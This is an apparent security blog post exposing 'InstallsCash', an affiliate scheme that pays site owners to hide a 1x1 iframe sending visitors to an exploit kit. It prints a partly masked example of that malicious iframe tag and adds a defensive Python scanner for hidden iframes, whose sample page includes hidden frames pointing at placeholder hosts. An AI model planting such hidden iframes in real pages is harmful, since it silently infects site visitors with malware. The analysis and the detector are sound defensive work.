Infect Your Own Website Visitors For Russian Cash
The InstallsCash partnership program invites affiliates to add a short, one-line iframe tag to their website pages. That hidden iframe then silently redirects every visitor to another site, where the program's malware is installed through an MPack-like exploit process. Each successful installation originating from an affiliate site earns the affiliate a payment.
To cover their tracks, the InstallsCash domain is, of course, registered through a Chinese registrar (bizcn.com). The registrant address is a fake one in the US (Iowa City), and the contact e-mail is at a free webmail service popular in Russia (ydwrtyxamz_at_mail.ru). The account name was obviously chosen at random.
Subscribers to this “program” are offered a list of accepted payment systems, the usual ones favoured by online criminals. Once registered, they are told to wait 24 hours for account activation.
After this period the subscriber receives the IFRAME code, something like:
<iframe src="http://**************610.php" width=1 height=1></iframe>
The iframe must be hidden on the subscriber's website and points to yet another site with a strange, randomly generated name, apparently produced by a more or less automated method. The affiliator seems to create or assign a different one for each affiliate; these unique names are how the software tells affiliates apart, so that data can be fed into their stats page and the payouts calculated.
Basically, subscribers are paid per unique load of the InstallsCash IFRAME, which means that whoever signs up for InstallsCash and installs the code is redirecting and infecting the visitors of his own website through this invisible iframe.
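The iframe above is hidden purely by its 1x1 size, but the same trick is also done with CSS (display:none, visibility:hidden, or positioning the frame far off screen). The scanner below is an added example, not code from the original post or from InstallsCash: it walks a page's HTML with the standard-library parser and flags any iframe that is tiny, CSS-hidden or pushed off screen, noting when the frame's src points at a host other than the page's own. The sample page, the hostnames in it and the page host passed to the scanner are all constructed for this example.

```python
"""Find hidden iframes of the kind an InstallsCash-style affiliate plants.

Added example for illustration; not code from the original post.  The sample
HTML, hostnames and paths below are constructed, not observed data.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# CSS tricks that keep an iframe out of sight: display/visibility hiding,
# off-screen absolute positioning (left/top of -100px or further), or an
# explicit zero width/height.  The lookbehind keeps "border-width:0" from
# matching "width:0".
HIDING_CSS = re.compile(
    r"display\s*:\s*none"
    r"|visibility\s*:\s*hidden"
    r"|(?:left|top)\s*:\s*-\d{3,}px"
    r"|(?<![\w-])(?:width|height)\s*:\s*0(?:px)?\s*(?:;|$)",
    re.I,
)


def _px(value):
    """Parse a width/height attribute such as '1' or '1px'; None if not a pixel size."""
    if value is None:
        return None
    m = re.match(r"\s*(\d+)\s*(?:px)?\s*$", value)
    return int(m.group(1)) if m else None


class IframeFinder(HTMLParser):
    """Collects every <iframe> that looks hidden, with the reasons it was flagged."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":  # html.parser lowercases tag and attribute names
            return
        a = {k: (v or "") for k, v in attrs}
        reasons = []
        w, h = _px(a.get("width")), _px(a.get("height"))
        if (w is not None and w <= 1) or (h is not None and h <= 1):
            reasons.append("tiny size %sx%s" % (w, h))
        if HIDING_CSS.search(a.get("style", "")):
            reasons.append("hidden via CSS")
        if not reasons:
            return  # a visible iframe (e.g. a normal video embed) is not flagged
        src = a.get("src", "")
        host = urlparse(src).hostname
        if host and host.lower() != self.page_host:
            reasons.append("third-party src host %s" % host)
        self.findings.append({"line": self.getpos()[0], "src": src, "reasons": reasons})


def find_hidden_iframes(html, page_host):
    """Return a list of findings for hidden iframes in html; page_host is the site's own host."""
    finder = IframeFinder(page_host)
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample page: one legitimate visible embed and three hidden frames.
SAMPLE_PAGE = """<html><body>
<h1>Welcome</h1>
<iframe src="https://www.youtube.com/embed/abc123" width="560" height="315"></iframe>
<p>Some page text.</p>
<iframe src="http://affiliate-tag.example.net/in.php" width=1 height=1></iframe>
<iframe src="/help.html" style="display:none"></iframe>
<IFRAME SRC="http://loader.example.org/x.php" STYLE="position:absolute;left:-5000px" WIDTH=300 HEIGHT=200></IFRAME>
</body></html>"""


if __name__ == "__main__":
    for f in find_hidden_iframes(SAMPLE_PAGE, "www.example.com"):
        print("line %d: %s  [%s]" % (f["line"], f["src"], "; ".join(f["reasons"])))
```

Run against the sample, the scanner reports the three hidden frames and leaves the 560x315 video embed alone; the 1x1 frame is also marked as pointing at a third-party host, which is exactly the shape of the InstallsCash tag above. Running it over a crawl of your own pages (or over a server-side template directory) is a cheap way to catch an injected affiliate iframe.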
The InstallsCash distributor admits and warns: “…they will be updating every 3 days and they will be invisible for every antivirus!”
The registrar is bizcn.com, and the registrant contact again comes with a random e-mail address:
Jan Dendinger ycsmmiqtyo_at_mail.ru
Phone +1 3196433xxx Fax: +13.196433xxx
309 East Main Street
West Branch IA 523581
us
It seems that the same people are behind InstallsCash, IframeCash (September 2006) and IframeDollars (November 2007). In November 2007 the RBNExploit blog discussed that iFrameCash and iFrameDollars were possibly linked to the Russian Business Network; if so, RBN trading partners are still in business.
McAfee VirusScan detects and blocks the PHP script as JS/Exploit-BO.gen; some additional files are detected as Downloader-BDH.
April 3rd, 2008 at 7:14 am
[…] http://www.installscash.com Interesting articles about the company and how it works, you can find here: https://cyberinsecure.com/infect-your…-russian-cash/ http://www.avertlabs.com/research/blog/index.php/category/data-theft/ (above middle of the blog) […]